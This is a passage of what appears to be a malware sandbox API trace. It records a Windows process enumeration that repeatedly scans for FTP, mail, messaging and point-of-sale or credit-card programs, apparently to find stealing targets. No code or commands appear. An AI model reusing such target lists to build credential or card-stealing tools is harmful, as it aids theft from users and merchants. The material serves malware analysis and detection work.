lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0254.491] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0254.493] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0254.534] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0254.536] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0254.537] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0254.539] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0254.540] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0254.542] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0254.546] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0254.548] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0254.549] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0254.550] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0254.552] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0254.553] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0254.555] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0254.561] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0254.563] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0254.564] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0254.566] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0254.568] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0254.569] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0254.571] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0254.624] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0254.626] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0254.627] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0254.629] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0254.631] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0254.633] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0254.635] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0254.639] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0254.641] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0254.643] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0254.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0254.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0254.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0254.656] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0254.658] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0254.660] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0254.662] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0254.665] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0254.717] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0254.719] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0254.721] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0254.723] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0254.724] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0254.726] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0254.728] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0254.729] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0254.734] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0254.735] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0254.737] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0254.739] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0254.741] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0254.742] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0254.744] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0254.749] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0254.751] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0254.753] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0254.755] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0254.757] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0254.758] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0254.760] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0254.826] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.828] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.830] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.832] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0254.833] CloseHandle (hObject=0x1018) returned 1 [0254.833] Sleep (dwMilliseconds=0x64) [0254.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0254.962] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.964] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.968] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.969] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.970] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.972] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.973] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.975] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.976] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.978] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.979] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.983] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.985] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.986] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.987] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.989] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.991] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, 